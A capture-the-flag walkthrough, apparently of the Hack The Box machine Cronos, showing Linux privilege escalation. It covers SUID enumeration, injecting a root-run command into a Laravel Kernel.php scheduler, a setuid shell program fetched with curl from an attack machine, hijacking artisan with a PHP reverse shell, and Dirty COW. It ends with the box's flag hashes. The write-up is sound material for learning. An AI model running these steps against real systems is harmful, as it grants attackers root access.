-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd


[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 6 2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22 2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep 6 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30 2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22 2017 /etc/kernel-img.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/noulis/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 820 Mar 22 2017 /var/backups/group.bak
-rw------- 1 root root 1632 Mar 22 2017 /var/backups/passwd.bak
-rw------- 1 root shadow 690 Mar 22 2017 /var/backups/gshadow.bak
-rw------- 1 root shadow 1068 Mar 22 2017 /var/backups/shadow.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 15 2017 .
drwxr-xr-x 14 root root 4096 Mar 22 2017 ..


### SCAN COMPLETE ####################################

scheduled laravel owned by root

images/387-1.png

priv esc with Kernel.php

In this section we take advantage of Cronos's Laravel task scheduler: its app/Console/Kernel.php defines commands that the root cron job runs periodically, so anything we add there runs as root.

laravel scheduling task

images/386-1.png



images/386-2.png

app/Console/Kernel.php is where commands are scheduled!

images/386-3.png

$schedule->exec('cmd')->daily()

find app/Console/Kernel.php

we'll run find from / and look for any file named Kernel.php with the command

find / -name Kernel.php 2>/dev/null

images/388-1.png

Kernel.php is what we're looking for!
images/388-2.png

Kernel.php

Find the Kernel.php directory and open the file with vi
images/389-1.png


add a scheduled task that creates the file /tmp/ippsec every minute with
touch /tmp/ippsec
images/389-2.png


now wait a minute and check for the ippsec file
images/389-3.png


Success!

images/389-4.png

setuid.c

simple setuid C program to spawn a shell with root privileges:

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* only works once the binary is root-owned with the SUID bit set */
    setuid(0);
    setgid(0);
    /* absolute path: "bin/bash" would be resolved relative to the cwd */
    system("/bin/bash");
    return 0;
}


images/390-1.png


compile:
gcc getuid.c -o st0ve
images/390-2.png

no errors
images/390-3.png

CURL program to cronos

you can curl the file and output it to a file with
curl <attack_machine ip>:port/file -o savefile

images/391-1.png

give it execute permission with chmod +x <file> and run it with ./<file>
images/391-2.png

update Kernel.php / change owner of the SUID binary to root

since root runs the laravel Kernel.php schedule, we can have it change our setuid program to be owned by root with the following commands, then save the file

chown root:root /dev/shm/st0ve   changes ownership of the st0ve binary to root
chmod 4755 /dev/shm/st0ve        turns on the binary's SUID bit, so any user who runs it gets root as effective uid


images/392-1.png



images/392-2.png

BUT WAIT... we cannot run our SUID binary from /dev/shm (it is normally mounted nosuid, and sometimes noexec, so the SUID bit is ignored there; mount | grep /dev/shm shows the flags), so we need to move the file to the /tmp folder and execute it there....

move getuid.c to tmp folder & privesc

chmod 4755: the leading 4 is the setuid bit, the 7 gives the owner rwx, and the two 5s give group and others r-x. Because the owner is root, anyone who executes the file runs it with root as effective uid
the same scheduled command also moves our binary to the /tmp folder, where we can execute it


images/380-1.png
images/380-2.png

we use 4 digits because the SUID (set uid) bit sits above the rwx bits in the octal mode

protected function schedule(Schedule $schedule)
{
    // runs as root via the cron job: move first, then fix ownership and SUID on the new path
    $schedule->exec('mv /dev/shm/st0ve /tmp/st0ve; chown root:root /tmp/st0ve; chmod 4755 /tmp/st0ve')->everyMinute();
}


images/380-3.png

now we see our C program owned by root with the SUID bit set:
images/380-4.png

root

simply run it and we escalate to root!

images/393-1.png

priv esc with artisan

the root cron job runs Laravel's artisan, which is just a PHP script in the application directory, not a system binary
images/1106-1.png

if we check who owns this file, we see that we (www-data) do, even though it is run by root in the cron job
images/1106-2.png

because we OWN artisan we are allowed to rewrite it, so let's overwrite/hijack artisan with a php-reverse-shell back to our machine; root will then execute it every time the cron job fires

we can copy our php-reverse-shell over artisan, keeping the same file name

php-reverse-shell

lets first find our desired script on our attacking machine

images/1107-1.png

images/1107-2.png

next step is to set the parameters to connect back to our attack machine IP and a port we want to listen on
images/1107-3.png

we can either download this php script to the box or write it directly there

to have cronos download it, start a simple HTTP server with python on the attack machine (python -m SimpleHTTPServer, or python3 -m http.server) and fetch the file from the box

images/1107-4.png

images/1107-5.png

images/1107-6.png

images/1107-7.png

images/1107-8.png


priv esc with kernel exploit dirty cow

another method is to transfer linux-exploit-suggester to the box and see what types of vulnerabilities it reports

first transfer linux-exploit-suggester to the victim box's /dev/shm directory

images/1108-1.png

from this report we see Dirty COW should work; the exploit can be found by visiting the link in the report

I wasn't able to successfully exploit Dirty COW on this machine, but that doesn't mean it's not vulnerable. It could be vulnerable to a different variant of the exploit than the one I tested.

user/root

images/394-1.png
51d236438b333970dbba7dc3089be33b

images/394-2.png
1703b8a3c9a8dde879942c79d02fd3a0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1103-1.png

images/1103-2.png